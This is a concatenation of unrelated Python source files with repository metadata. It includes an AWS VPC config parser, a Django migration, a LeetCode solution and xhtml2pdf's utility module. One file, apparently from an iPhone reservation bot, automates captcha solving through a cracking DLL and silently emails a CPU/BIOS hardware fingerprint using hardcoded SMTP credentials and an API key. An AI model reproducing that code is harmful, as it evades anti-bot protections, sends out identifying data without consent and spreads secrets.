network_acl['rules']['ingress'] = self.__parse_network_acl_entries(network_acl['Entries'], False)
network_acl['rules']['egress'] = self.__parse_network_acl_entries(network_acl['Entries'], True)
network_acl.pop('Entries')
# Save
manage_dictionary(self.vpcs, vpc_id, SingleVPCConfig(self.vpc_resource_types))
self.vpcs[vpc_id].network_acls[network_acl['id']] = network_acl
def __parse_network_acl_entries(self, entries, egress):
"""
:param entries:
:param egress:
:return:
"""
acl_dict = {}
for entry in entries:
if entry['Egress'] == egress:
acl = {}
for key in ['RuleAction', 'RuleNumber']:
acl[key] = entry[key]
acl['CidrBlock'] = entry['CidrBlock'] if 'CidrBlock' in entry else entry['Ipv6CidrBlock']
acl['protocol'] = protocols_dict[entry['Protocol']]
if 'PortRange' in entry:
from_port = entry['PortRange']['From'] if entry['PortRange']['From'] else 1
to_port = entry['PortRange']['To'] if entry['PortRange']['To'] else 65535
acl['port_range'] = from_port if from_port == to_port else str(from_port) + '-' + str(to_port)
else:
acl['port_range'] = '1-65535'
acl_dict[acl.pop('RuleNumber')] = acl
return acl_dict
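# The result is keyed by rule number, e.g.
# {100: {'RuleAction': 'allow', 'CidrBlock': '0.0.0.0/0',
#        'protocol': 'TCP', 'port_range': '443'}} (values are illustrative).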
def parse_route_table(self, global_params, region, rt):
route_table = {}
vpc_id = rt['VpcId']
get_name(rt, route_table, 'VpcId') # TODO: change get_name to have src then dst
get_keys(rt, route_table, ['Routes', 'Associations', 'PropagatingVgws'])
# Save
manage_dictionary(self.vpcs, vpc_id, SingleVPCConfig(self.vpc_resource_types))
self.vpcs[vpc_id].route_tables[rt['RouteTableId']] = route_table
def parse_subnet(self, global_params, region, subnet):
"""
:param global_params:
:param region:
:param subnet:
:return:
"""
vpc_id = subnet['VpcId']
manage_dictionary(self.vpcs, vpc_id, SingleVPCConfig(self.vpc_resource_types))
subnet_id = subnet['SubnetId']
get_name(subnet, subnet, 'SubnetId')
subnet['flow_logs'] = []
# Save
manage_dictionary(self.vpcs, vpc_id, SingleVPCConfig(self.vpc_resource_types))
self.vpcs[vpc_id].subnets[subnet_id] = subnet
def parse_vpc(self, global_params, region_name, vpc):
"""
:param global_params:
:param region_name:
:param vpc:
:return:
"""
vpc_id = vpc['VpcId']
# Save
manage_dictionary(self.vpcs, vpc_id, SingleVPCConfig(self.vpc_resource_types))
self.vpcs[vpc_id].name = get_name(vpc, {}, 'VpcId')
def parse_vpn_connection(self, global_params, region_name, vpnc):
vpnc['id'] = vpnc.pop('VpnConnectionId')
self.vpn_connections[vpnc['id']] = vpnc
def parse_vpn_gateway(self, global_params, region_name, vpng):
vpng['id'] = vpng.pop('VpnGatewayId')
self.vpn_gateways[vpng['id']] = vpng
########################################
# VPCConfig
########################################
class VPCConfig(RegionalServiceConfig):
"""
VPC configuration for all AWS regions
"""
region_config_class = VPCRegionConfig
def __init__(self, service_metadata, thread_config):
super(VPCConfig, self).__init__(service_metadata, thread_config)
########################################
##### VPC analysis functions
########################################
#
# Add a display name for all known CIDRs
#
known_cidrs = {'0.0.0.0/0': 'All'}
def put_cidr_name(aws_config, current_config, path, current_path, resource_id, callback_args):
if 'cidrs' in current_config:
cidr_list = []
for cidr in current_config['cidrs']:
if type(cidr) == dict:
cidr = cidr['CIDR']
if cidr in known_cidrs:
cidr_name = known_cidrs[cidr]
else:
cidr_name = get_cidr_name(cidr, callback_args['ip_ranges'], callback_args['ip_ranges_name_key'])
known_cidrs[cidr] = cidr_name
cidr_list.append({'CIDR': cidr, 'CIDRName': cidr_name})
current_config['cidrs'] = cidr_list
#
# Read display name for CIDRs from ip-ranges files
#
aws_ip_ranges = {} # read_ip_ranges(aws_ip_ranges_filename, False)
def get_cidr_name(cidr, ip_ranges_files, ip_ranges_name_key):
for filename in ip_ranges_files:
ip_ranges = read_ip_ranges(filename, local_file = True)
for ip_range in ip_ranges:
ip_prefix = netaddr.IPNetwork(ip_range['ip_prefix'])
cidr = netaddr.IPNetwork(cidr)
if cidr in ip_prefix:
return ip_range[ip_ranges_name_key].strip()
for ip_range in aws_ip_ranges:
ip_prefix = netaddr.IPNetwork(ip_range['ip_prefix'])
cidr = netaddr.IPNetwork(cidr)
if cidr in ip_prefix:
return 'Unknown CIDR in %s %s' % (ip_range['service'], ip_range['region'])
return 'Unknown CIDR'
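# Illustrative call (file name and name key are hypothetical):
#   get_cidr_name('10.0.1.5/32', ['office-ip-ranges.json'], 'name')
# returns the matching display name, or 'Unknown CIDR' when nothing matches.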
#
# Propagate VPC names in VPC-related services (info only fetched during EC2 calls)
#
def propagate_vpc_names(aws_config, current_config, path, current_path, resource_id, callback_args):
if resource_id == ec2_classic:
current_config['name'] = ec2_classic
else:
target_path = copy.deepcopy(current_path)
target_path[1] = 'ec2'
target_path.append(resource_id)
target_path.append('Name')
target_path = '.'.join(target_path)
current_config['name'] = get_value_at(aws_config, target_path, target_path)
|
SecurityFTW/cs-suite
|
tools/Scout2/AWSScout2/services/vpc.py
|
Python
|
gpl-3.0
| 7,331 | 0.005866 |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('organizations', '0002_migrate_locations_to_facilities'),
('notifications', '0003_auto_20150912_2049'),
]
operations = [
migrations.AlterField(
model_name='notification',
name='location',
field=models.ForeignKey(verbose_name='facility', to='organizations.Facility'),
),
migrations.RenameField(
model_name='notification',
old_name='location',
new_name='facility',
),
migrations.AlterField(
model_name='notification',
name='facility',
field=models.ForeignKey(to='organizations.Facility'),
),
]
|
alper/volunteer_planner
|
notifications/migrations/0004_auto_20151003_2033.py
|
Python
|
agpl-3.0
| 847 | 0.001181 |
#__author__ = 'hello'
# -*- coding: cp936 -*-
import re
import os
import random
import json
import string
import ctypes
from myexception import *
PATH = './img/'
dm2 = ctypes.WinDLL('./CrackCaptchaAPI.dll')
if not os.path.exists('./img'):
os.mkdir('./img')
def str_tr(content):
instr = "0123456789"
outstr ="QAEDTGUJOL"
trantab = string.maketrans(instr,outstr)
return content.translate(trantab)
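# Example of the digit-to-letter mapping above (assumes Python 2's string.maketrans):
#   str_tr('2017') -> 'EQAJ'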
def getHid():
import wmi
m = wmi.WMI()
a = ''
b = ''
for cpu in m.Win32_Processor():
a = cpu.Processorid.strip()
for bd in m.Win32_BIOS():
b= bd.SerialNumber.strip()
return a+b
def getEightRandomString():
return ''.join(random.sample(string.ascii_letters,8))
def getCToken(content):
s = ''
pattern = re.compile('securityCToken = "([+-]?\d*)"')
match = pattern.search(content)
if match:
s = match.group(1)
return s
def GetCaptcha(content):
global PATH
filename = ''.join(random.sample(string.ascii_letters,8))
filename += '.jpg'
filename = PATH+filename
img = None
try:
img = open(filename,'wb')
img.write(content)
except IOError:
raise FileCanNotCreate('open file error')
finally:
if img:
img.close()
dm2.D2File.argtypes=[ctypes.c_char_p, ctypes.c_char_p, ctypes.c_char_p, ctypes.c_char_p, ctypes.c_short, ctypes.c_int, ctypes.c_char_p]
dm2.D2File.restype = ctypes.c_int
key = ctypes.c_char_p('fa6fd217145f273b59d7e72c1b63386e')
id = ctypes.c_long(54)
user = ctypes.c_char_p('test')
pas = ctypes.c_char_p('test')
timeout = ctypes.c_short(30)
result = ctypes.create_string_buffer('/0'*100)
ret = -1
ret = dm2.D2File(key,user, pas, filename,timeout,id,(result))
if ret > 0:
return result.value
elif ret == -101:
        raise D2FILE(u'Insufficient balance, recharge required')
elif ret > -199:
raise D2FILE('user info error')
elif ret == -208:
raise D2FILE('software can not user')
elif ret == -210:
raise D2FILE('invalid user')
elif ret == -301:
raise D2FILE('can not find dll')
else:
        raise D2FILE(u'Recognition library error')
def GetTimeSlot(content,num):
try:
timeslot = json.loads(content)
slotLen = len(timeslot['timeSlots'])
if num < slotLen:
            return timeslot['timeSlots'][num]['startTime'], timeslot['timeSlots'][num]['timeslotID']
        elif slotLen > 0:
            return timeslot['timeSlots'][slotLen-1]['startTime'], timeslot['timeSlots'][slotLen-1]['timeslotID']
    except ValueError, e:
raise NoJsonData('')
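# Expected JSON shape for GetTimeSlot (inferred from the lookups above, values hypothetical):
#   {"timeSlots": [{"startTime": "09:00", "timeslotID": "42"}, ...]}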
def sendEmail(count):
import smtplib
from email.mime.text import MIMEText
from email.header import Header
smtpserver = 'smtp.163.com'
sender = '[email protected]'
receiver = '[email protected]'
    subject = u'Reservation count'
user = 'sghcarbon'
pas = 'carbon216'
    content = getHid() + u'Reservation count:' + str(count)
msg = MIMEText(content,'plain','utf-8')
msg['Subject'] = Header(subject,'utf-8')
msg['From'] = sender
msg['To'] = receiver
try:
send_smtp = smtplib.SMTP()
send_smtp.connect(smtpserver)
send_smtp.login(user,pas)
send_smtp.sendmail(sender,receiver,msg.as_string())
send_smtp.close()
print 'ok'
except:
print 'error'
|
dading/iphone_order
|
util.py
|
Python
|
apache-2.0
| 3,365 | 0.012184 |
import collections
class Solution(object):
def findPaths(self, m, n, N, i, j):
"""
:type m: int
:type n: int
:type N: int
:type i: int
:type j: int
:rtype: int
"""
MOD = 1000000007
paths = 0
cur = {(i, j): 1}
for i in xrange(N):
next = collections.defaultdict(int)
for (x, y), cnt in cur.iteritems():
for dx, dy in [[-1, 0], [0, 1], [1, 0], [0, -1]]:
nx = x + dx
ny = y + dy
if nx < 0 or ny < 0 or nx >= m or ny >= n:
paths += cnt
paths %= MOD
else:
next[(nx, ny)] += cnt
next[(nx, ny)] %= MOD
cur = next
return paths
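# Example (LeetCode 576, example 1): Solution().findPaths(2, 2, 2, 0, 0) == 6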
# 94 / 94 test cases passed.
# Status: Accepted
# Runtime: 232 ms
# beats 75.36 %
|
zqfan/leetcode
|
algorithms/576. Out of Boundary Paths/solution.py
|
Python
|
gpl-3.0
| 918 | 0 |
# -*- coding: ISO-8859-1 -*-
# Copyright 2010 Dirk Holtwick, holtwick.it
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
__reversion__ = "$Revision: 20 $"
__author__ = "$Author: holtwick $"
__date__ = "$Date: 2007-10-09 12:58:24 +0200 (Di, 09 Okt 2007) $"
from reportlab.lib.units import inch, cm
from reportlab.lib.styles import *
from reportlab.lib.enums import *
from reportlab.lib.colors import *
from reportlab.lib.pagesizes import *
from reportlab.pdfbase import pdfmetrics
# from reportlab.platypus import *
# from reportlab.platypus.flowables import Flowable
# from reportlab.platypus.tableofcontents import TableOfContents
# from reportlab.platypus.para import Para, PageNumberObject, UNDERLINE, HotLink
import reportlab
import copy
import types
import os
import os.path
import pprint
import sys
import string
import re
import base64
import urlparse
import mimetypes
import urllib2
import urllib
import httplib
import tempfile
import shutil
rgb_re = re.compile("^.*?rgb[(]([0-9]+).*?([0-9]+).*?([0-9]+)[)].*?[ ]*$")
_reportlab_version = tuple(map(int, reportlab.Version.split('.')))
if _reportlab_version < (2,1):
raise ImportError("Reportlab Version 2.1+ is needed!")
REPORTLAB22 = _reportlab_version >= (2, 2)
#if not(reportlab.Version[0] == "2" and reportlab.Version[2] >= "1"):
# raise ImportError("Reportlab Version 2.1+ is needed!")
#
#REPORTLAB22 = (reportlab.Version[0] == "2" and reportlab.Version[2] >= "2")
# print "***", reportlab.Version, REPORTLAB22, reportlab.__file__
import logging
log = logging.getLogger("ho.pisa")
try:
import cStringIO as StringIO
except:
import StringIO
try:
import pyPdf
except:
pyPdf = None
try:
from reportlab.graphics import renderPM
except:
renderPM = None
try:
from reportlab.graphics import renderSVG
except:
renderSVG = None
def ErrorMsg():
"""
Helper to get a nice traceback as string
"""
import traceback, sys, cgi
type = value = tb = limit = None
type, value, tb = sys.exc_info()
list = traceback.format_tb(tb, limit) + traceback.format_exception_only(type, value)
return "Traceback (innermost last):\n" + "%-20s %s" % (
string.join(list[: - 1], ""),
list[ - 1])
def toList(value):
if type(value) not in (types.ListType, types.TupleType):
return [value]
return list(value)
def flatten(x):
"""flatten(sequence) -> list
copied from http://kogs-www.informatik.uni-hamburg.de/~meine/python_tricks
Returns a single, flat list which contains all elements retrieved
from the sequence and all recursively contained sub-sequences
(iterables).
Examples:
>>> [1, 2, [3,4], (5,6)]
[1, 2, [3, 4], (5, 6)]
>>> flatten([[[1,2,3], (42,None)], [4,5], [6], 7, MyVector(8,9,10)])
[1, 2, 3, 42, None, 4, 5, 6, 7, 8, 9, 10]"""
result = []
for el in x:
#if isinstance(el, (list, tuple)):
if hasattr(el, "__iter__") and not isinstance(el, basestring):
result.extend(flatten(el))
else:
result.append(el)
return result
def _toColor(arg, default=None):
'''try to map an arbitrary arg to a color instance'''
if isinstance(arg, Color): return arg
tArg = type(arg)
if tArg in (types.ListType, types.TupleType):
assert 3 <= len(arg) <= 4, 'Can only convert 3 and 4 sequences to color'
assert 0 <= min(arg) and max(arg) <= 1
return len(arg) == 3 and Color(arg[0], arg[1], arg[2]) or CMYKColor(arg[0], arg[1], arg[2], arg[3])
elif tArg == types.StringType:
C = getAllNamedColors()
s = arg.lower()
if C.has_key(s): return C[s]
try:
return toColor(eval(arg))
except:
pass
try:
return HexColor(arg)
except:
if default is None:
raise ValueError('Invalid color value %r' % arg)
return default
def getColor(value, default=None):
" Convert to color value "
try:
original = value
if isinstance(value, Color):
return value
value = str(value).strip().lower()
if value == "transparent" or value == "none":
return default
if value in COLOR_BY_NAME:
return COLOR_BY_NAME[value]
if value.startswith("#") and len(value) == 4:
value = "#" + value[1] + value[1] + value[2] + value[2] + value[3] + value[3]
elif rgb_re.search(value):
# e.g., value = "<css function: rgb(153, 51, 153)>", go figure:
r, g, b = [int(x) for x in rgb_re.search(value).groups()]
value = "#%02x%02x%02x" % (r, g, b)
else:
# Shrug
pass
# XXX Throws illegal in 2.1 e.g. toColor('none'),
# therefore we have a workaround here
return _toColor(value)
except ValueError, e:
log.warn("Unknown color %r", original)
return default
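# Illustrative conversions handled by getColor above:
#   getColor("#f00")            -> same Color as getColor("#ff0000")
#   getColor("rgb(255, 0, 0)")  -> Color(1, 0, 0)
#   getColor("transparent")     -> the supplied default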
def getBorderStyle(value, default=None):
# log.debug(value)
if value and (str(value).lower() not in ("none", "hidden")):
return value
return default
mm = cm / 10.0
dpi96 = (1.0 / 96.0 * inch)
_absoluteSizeTable = {
"1": 50.0 / 100.0,
"xx-small": 50.0 / 100.0,
"x-small": 50.0 / 100.0,
"2": 75.0 / 100.0,
"small": 75.0 / 100.0,
"3": 100.0 / 100.0,
"medium": 100.0 / 100.0,
"4": 125.0 / 100.0,
"large": 125.0 / 100.0,
"5": 150.0 / 100.0,
"x-large": 150.0 / 100.0,
"6": 175.0 / 100.0,
"xx-large": 175.0 / 100.0,
"7": 200.0 / 100.0,
"xxx-large": 200.0 / 100.0,
#"xx-small" : 3./5.,
#"x-small": 3./4.,
#"small": 8./9.,
#"medium": 1./1.,
#"large": 6./5.,
#"x-large": 3./2.,
#"xx-large": 2./1.,
#"xxx-large": 3./1.,
}
_relativeSizeTable = {
"larger": 1.25,
"smaller": 0.75,
"+4": 200.0 / 100.0,
"+3": 175.0 / 100.0,
"+2": 150.0 / 100.0,
"+1": 125.0 / 100.0,
"-1": 75.0 / 100.0,
"-2": 50.0 / 100.0,
"-3": 25.0 / 100.0,
}
MIN_FONT_SIZE = 1.0
def getSize(value, relative=0, base=None, default=0.0):
"""
Converts strings to standard sizes
"""
try:
original = value
if value is None:
return relative
elif type(value) is types.FloatType:
return value
elif type(value) is types.IntType:
return float(value)
elif type(value) in (types.TupleType, types.ListType):
value = "".join(value)
value = str(value).strip().lower().replace(",", ".")
if value[ - 2:] == 'cm':
return float(value[: - 2].strip()) * cm
elif value[ - 2:] == 'mm':
return (float(value[: - 2].strip()) * mm) # 1mm = 0.1cm
elif value[ - 2:] == 'in':
return float(value[: - 2].strip()) * inch # 1pt == 1/72inch
        elif value[ - 4:] == 'inch':
return float(value[: - 4].strip()) * inch # 1pt == 1/72inch
elif value[ - 2:] == 'pt':
return float(value[: - 2].strip())
elif value[ - 2:] == 'pc':
return float(value[: - 2].strip()) * 12.0 # 1pc == 12pt
elif value[ - 2:] == 'px':
return float(value[: - 2].strip()) * dpi96 # XXX W3C says, use 96pdi http://www.w3.org/TR/CSS21/syndata.html#length-units
elif value[ - 1:] == 'i': # 1pt == 1/72inch
return float(value[: - 1].strip()) * inch
elif value in ("none", "0", "auto"):
return 0.0
elif relative:
if value[ - 2:] == 'em': # XXX
return (float(value[: - 2].strip()) * relative) # 1em = 1 * fontSize
elif value[ - 2:] == 'ex': # XXX
return (float(value[: - 2].strip()) * (relative / 2.0)) # 1ex = 1/2 fontSize
elif value[ - 1:] == '%':
# print "%", value, relative, (relative * float(value[:-1].strip())) / 100.0
return (relative * float(value[: - 1].strip())) / 100.0 # 1% = (fontSize * 1) / 100
elif value in ("normal", "inherit"):
return relative
elif _relativeSizeTable.has_key(value):
if base:
return max(MIN_FONT_SIZE, base * _relativeSizeTable[value])
return max(MIN_FONT_SIZE, relative * _relativeSizeTable[value])
elif _absoluteSizeTable.has_key(value):
if base:
return max(MIN_FONT_SIZE, base * _absoluteSizeTable[value])
return max(MIN_FONT_SIZE, relative * _absoluteSizeTable[value])
try:
value = float(value)
except:
log.warn("getSize: Not a float %r", value)
return default #value = 0
return max(0, value)
except Exception:
log.warn("getSize %r %r", original, relative, exc_info=1)
# print "ERROR getSize", repr(value), repr(value), e
return default
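# Illustrative conversions performed by getSize (point values rounded):
#   getSize("12pt")              -> 12.0
#   getSize("2cm")               -> ~56.7  (2 * cm)
#   getSize("150%", relative=10) -> 15.0
#   getSize("auto")              -> 0.0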
def getCoords(x, y, w, h, pagesize):
"""
As a stupid programmer I like to use the upper left
corner of the document as the 0,0 coords therefore
we need to do some fancy calculations
"""
#~ print pagesize
ax, ay = pagesize
if x < 0:
x = ax + x
if y < 0:
y = ay + y
if w != None and h != None:
if w <= 0:
w = (ax - x + w)
if h <= 0:
h = (ay - y + h)
return x, (ay - y - h), w, h
return x, (ay - y)
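# Illustrative flip from a top-left origin to ReportLab's bottom-left origin on an
# A4-sized page (595 x 842 pt): getCoords(0, 0, 100, 50, (595, 842)) -> (0, 792, 100, 50)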
def getBox(box, pagesize):
"""
Parse sizes by corners in the form:
<X-Left> <Y-Upper> <Width> <Height>
    The last two values, when negative, are interpreted as offsets from
    the right and lower border.
"""
box = str(box).split()
if len(box) != 4:
raise Exception, "box not defined right way"
x, y, w, h = map(getSize, box)
return getCoords(x, y, w, h, pagesize)
def getPos(position, pagesize):
"""
Pair of coordinates
"""
position = str(position).split()
if len(position) != 2:
raise Exception, "position not defined right way"
x, y = map(getSize, position)
return getCoords(x, y, None, None, pagesize)
def getBool(s):
" Is it a boolean? "
return str(s).lower() in ("y", "yes", "1", "true")
_uid = 0
def getUID():
" Unique ID "
global _uid
_uid += 1
return str(_uid)
_alignments = {
"left": TA_LEFT,
"center": TA_CENTER,
"middle": TA_CENTER,
"right": TA_RIGHT,
"justify": TA_JUSTIFY,
}
def getAlign(value, default=TA_LEFT):
return _alignments.get(str(value).lower(), default)
#def getVAlign(value):
# # Unused
# return str(value).upper()
GAE = "google.appengine" in sys.modules
if GAE:
STRATEGIES = (
StringIO.StringIO,
StringIO.StringIO)
else:
STRATEGIES = (
StringIO.StringIO,
tempfile.NamedTemporaryFile)
class pisaTempFile(object):
"""A temporary file implementation that uses memory unless
either capacity is breached or fileno is requested, at which
point a real temporary file will be created and the relevant
details returned
If capacity is -1 the second strategy will never be used.
Inspired by:
http://code.activestate.com/recipes/496744/
"""
STRATEGIES = STRATEGIES
CAPACITY = 10 * 1024
def __init__(self, buffer="", capacity=CAPACITY):
"""Creates a TempFile object containing the specified buffer.
If capacity is specified, we use a real temporary file once the
file gets larger than that size. Otherwise, the data is stored
in memory.
"""
#if hasattr(buffer, "read"):
#shutil.copyfileobj( fsrc, fdst[, length])
self.capacity = capacity
self.strategy = int(len(buffer) > self.capacity)
try:
self._delegate = self.STRATEGIES[self.strategy]()
except:
# Fallback for Google AppEnginge etc.
self._delegate = self.STRATEGIES[0]()
self.write(buffer)
def makeTempFile(self):
" Switch to next startegy. If an error occured stay with the first strategy "
if self.strategy == 0:
try:
new_delegate = self.STRATEGIES[1]()
new_delegate.write(self.getvalue())
self._delegate = new_delegate
self.strategy = 1
log.warn("Created temporary file %s", self.name)
except:
self.capacity = - 1
def getFileName(self):
" Get a named temporary file "
self.makeTempFile()
return self.name
def fileno(self):
"""Forces this buffer to use a temporary file as the underlying.
object and returns the fileno associated with it.
"""
self.makeTempFile()
return self._delegate.fileno()
def getvalue(self):
" Get value of file. Work around for second strategy "
if self.strategy == 0:
return self._delegate.getvalue()
self._delegate.flush()
self._delegate.seek(0)
return self._delegate.read()
def write(self, value):
" If capacity != -1 and length of file > capacity it is time to switch "
if self.capacity > 0 and self.strategy == 0:
len_value = len(value)
if len_value >= self.capacity:
needs_new_strategy = True
else:
self.seek(0, 2) # find end of file
needs_new_strategy = \
(self.tell() + len_value) >= self.capacity
if needs_new_strategy:
self.makeTempFile()
self._delegate.write(value)
def __getattr__(self, name):
try:
return getattr(self._delegate, name)
except AttributeError:
# hide the delegation
e = "object '%s' has no attribute '%s'" \
% (self.__class__.__name__, name)
raise AttributeError(e)
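# Rough usage sketch (assumed): small buffers stay in StringIO, and once more than
# CAPACITY (10 KiB) has been written the content migrates to a temporary file.
#   buf = pisaTempFile("small payload")   # strategy 0: in memory
#   buf.write("x" * (20 * 1024))          # exceeds capacity, switches to strategy 1
#   buf.getvalue()                        # works transparently in either strategy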
_rx_datauri = re.compile("^data:(?P<mime>[a-z]+/[a-z]+);base64,(?P<data>.*)$", re.M | re.DOTALL)
class pisaFileObject:
"""
XXX
"""
def __init__(self, uri, basepath=None):
self.basepath = basepath
self.mimetype = None
self.file = None
self.data = None
self.uri = None
self.local = None
self.tmp_file = None
uri = str(uri)
log.debug("FileObject %r, Basepath: %r", uri, basepath)
# Data URI
if uri.startswith("data:"):
m = _rx_datauri.match(uri)
self.mimetype = m.group("mime")
self.data = base64.decodestring(m.group("data"))
else:
# Check if we have an external scheme
if basepath and not (uri.startswith("http://") or uri.startswith("https://")):
urlParts = urlparse.urlparse(basepath)
else:
urlParts = urlparse.urlparse(uri)
log.debug("URLParts: %r", urlParts)
# Drive letters have len==1 but we are looking for things like http:
if len(urlParts[0]) > 1 :
# External data
if basepath:
uri = urlparse.urljoin(basepath, uri)
#path = urlparse.urlsplit(url)[2]
#mimetype = getMimeType(path)
# Using HTTPLIB
server, path = urllib.splithost(uri[uri.find("//"):])
if uri.startswith("https://"):
conn = httplib.HTTPSConnection(server)
else:
conn = httplib.HTTPConnection(server)
conn.request("GET", path)
r1 = conn.getresponse()
# log.debug("HTTP %r %r %r %r", server, path, uri, r1)
if (r1.status, r1.reason) == (200, "OK"):
# data = r1.read()
self.mimetype = r1.getheader("Content-Type", None).split(";")[0]
self.uri = uri
if r1.getheader("content-encoding") == "gzip":
# zbuf = cStringIO.StringIO(data)
import gzip
self.file = gzip.GzipFile(mode="rb", fileobj=r1)
#data = zfile.read()
#zfile.close()
else:
self.file = r1
# self.file = urlResponse
else:
urlResponse = urllib2.urlopen(uri)
self.mimetype = urlResponse.info().get("Content-Type", None).split(";")[0]
self.uri = urlResponse.geturl()
self.file = urlResponse
else:
# Local data
if basepath:
uri = os.path.normpath(os.path.join(basepath, uri))
if os.path.isfile(uri):
self.uri = uri
self.local = uri
self.setMimeTypeByName(uri)
self.file = open(uri, "rb")
def getFile(self):
if self.file is not None:
return self.file
if self.data is not None:
return pisaTempFile(self.data)
return None
def getNamedFile(self):
if self.notFound():
return None
if self.local:
return str(self.local)
if not self.tmp_file:
self.tmp_file = tempfile.NamedTemporaryFile()
if self.file:
shutil.copyfileobj(self.file, self.tmp_file)
else:
self.tmp_file.write(self.getData())
self.tmp_file.flush()
return self.tmp_file.name
def getData(self):
if self.data is not None:
return self.data
if self.file is not None:
self.data = self.file.read()
return self.data
return None
def notFound(self):
return (self.file is None) and (self.data is None)
def setMimeTypeByName(self, name):
" Guess the mime type "
        mimetype = mimetypes.guess_type(name)[0]
        if mimetype is not None:
            self.mimetype = mimetype.split(";")[0]
def getFile(*a , **kw):
file = pisaFileObject(*a, **kw)
if file.notFound():
return None
return file
COLOR_BY_NAME = {
'activeborder': Color(212, 208, 200),
'activecaption': Color(10, 36, 106),
'aliceblue': Color(.941176, .972549, 1),
'antiquewhite': Color(.980392, .921569, .843137),
'appworkspace': Color(128, 128, 128),
'aqua': Color(0, 1, 1),
'aquamarine': Color(.498039, 1, .831373),
'azure': Color(.941176, 1, 1),
'background': Color(58, 110, 165),
'beige': Color(.960784, .960784, .862745),
'bisque': Color(1, .894118, .768627),
'black': Color(0, 0, 0),
'blanchedalmond': Color(1, .921569, .803922),
'blue': Color(0, 0, 1),
'blueviolet': Color(.541176, .168627, .886275),
'brown': Color(.647059, .164706, .164706),
'burlywood': Color(.870588, .721569, .529412),
'buttonface': Color(212, 208, 200),
'buttonhighlight': Color(255, 255, 255),
'buttonshadow': Color(128, 128, 128),
'buttontext': Color(0, 0, 0),
'cadetblue': Color(.372549, .619608, .627451),
'captiontext': Color(255, 255, 255),
'chartreuse': Color(.498039, 1, 0),
'chocolate': Color(.823529, .411765, .117647),
'coral': Color(1, .498039, .313725),
'cornflowerblue': Color(.392157, .584314, .929412),
'cornsilk': Color(1, .972549, .862745),
'crimson': Color(.862745, .078431, .235294),
'cyan': Color(0, 1, 1),
'darkblue': Color(0, 0, .545098),
'darkcyan': Color(0, .545098, .545098),
'darkgoldenrod': Color(.721569, .52549, .043137),
'darkgray': Color(.662745, .662745, .662745),
'darkgreen': Color(0, .392157, 0),
'darkgrey': Color(.662745, .662745, .662745),
'darkkhaki': Color(.741176, .717647, .419608),
'darkmagenta': Color(.545098, 0, .545098),
'darkolivegreen': Color(.333333, .419608, .184314),
'darkorange': Color(1, .54902, 0),
'darkorchid': Color(.6, .196078, .8),
'darkred': Color(.545098, 0, 0),
'darksalmon': Color(.913725, .588235, .478431),
'darkseagreen': Color(.560784, .737255, .560784),
'darkslateblue': Color(.282353, .239216, .545098),
'darkslategray': Color(.184314, .309804, .309804),
'darkslategrey': Color(.184314, .309804, .309804),
'darkturquoise': Color(0, .807843, .819608),
'darkviolet': Color(.580392, 0, .827451),
'deeppink': Color(1, .078431, .576471),
'deepskyblue': Color(0, .74902, 1),
'dimgray': Color(.411765, .411765, .411765),
'dimgrey': Color(.411765, .411765, .411765),
'dodgerblue': Color(.117647, .564706, 1),
'firebrick': Color(.698039, .133333, .133333),
'floralwhite': Color(1, .980392, .941176),
'forestgreen': Color(.133333, .545098, .133333),
'fuchsia': Color(1, 0, 1),
'gainsboro': Color(.862745, .862745, .862745),
'ghostwhite': Color(.972549, .972549, 1),
'gold': Color(1, .843137, 0),
'goldenrod': Color(.854902, .647059, .12549),
'gray': Color(.501961, .501961, .501961),
'graytext': Color(128, 128, 128),
'green': Color(0, .501961, 0),
'greenyellow': Color(.678431, 1, .184314),
'grey': Color(.501961, .501961, .501961),
'highlight': Color(10, 36, 106),
'highlighttext': Color(255, 255, 255),
'honeydew': Color(.941176, 1, .941176),
'hotpink': Color(1, .411765, .705882),
'inactiveborder': Color(212, 208, 200),
'inactivecaption': Color(128, 128, 128),
'inactivecaptiontext': Color(212, 208, 200),
'indianred': Color(.803922, .360784, .360784),
'indigo': Color(.294118, 0, .509804),
'infobackground': Color(255, 255, 225),
'infotext': Color(0, 0, 0),
'ivory': Color(1, 1, .941176),
'khaki': Color(.941176, .901961, .54902),
'lavender': Color(.901961, .901961, .980392),
'lavenderblush': Color(1, .941176, .960784),
'lawngreen': Color(.486275, .988235, 0),
'lemonchiffon': Color(1, .980392, .803922),
'lightblue': Color(.678431, .847059, .901961),
'lightcoral': Color(.941176, .501961, .501961),
'lightcyan': Color(.878431, 1, 1),
'lightgoldenrodyellow': Color(.980392, .980392, .823529),
'lightgray': Color(.827451, .827451, .827451),
'lightgreen': Color(.564706, .933333, .564706),
'lightgrey': Color(.827451, .827451, .827451),
'lightpink': Color(1, .713725, .756863),
'lightsalmon': Color(1, .627451, .478431),
'lightseagreen': Color(.12549, .698039, .666667),
'lightskyblue': Color(.529412, .807843, .980392),
'lightslategray': Color(.466667, .533333, .6),
'lightslategrey': Color(.466667, .533333, .6),
'lightsteelblue': Color(.690196, .768627, .870588),
'lightyellow': Color(1, 1, .878431),
'lime': Color(0, 1, 0),
'limegreen': Color(.196078, .803922, .196078),
'linen': Color(.980392, .941176, .901961),
'magenta': Color(1, 0, 1),
'maroon': Color(.501961, 0, 0),
'mediumaquamarine': Color(.4, .803922, .666667),
'mediumblue': Color(0, 0, .803922),
'mediumorchid': Color(.729412, .333333, .827451),
'mediumpurple': Color(.576471, .439216, .858824),
'mediumseagreen': Color(.235294, .701961, .443137),
'mediumslateblue': Color(.482353, .407843, .933333),
'mediumspringgreen': Color(0, .980392, .603922),
'mediumturquoise': Color(.282353, .819608, .8),
'mediumvioletred': Color(.780392, .082353, .521569),
'menu': Color(212, 208, 200),
'menutext': Color(0, 0, 0),
'midnightblue': Color(.098039, .098039, .439216),
'mintcream': Color(.960784, 1, .980392),
'mistyrose': Color(1, .894118, .882353),
'moccasin': Color(1, .894118, .709804),
'navajowhite': Color(1, .870588, .678431),
'navy': Color(0, 0, .501961),
'oldlace': Color(.992157, .960784, .901961),
'olive': Color(.501961, .501961, 0),
'olivedrab': Color(.419608, .556863, .137255),
'orange': Color(1, .647059, 0),
'orangered': Color(1, .270588, 0),
'orchid': Color(.854902, .439216, .839216),
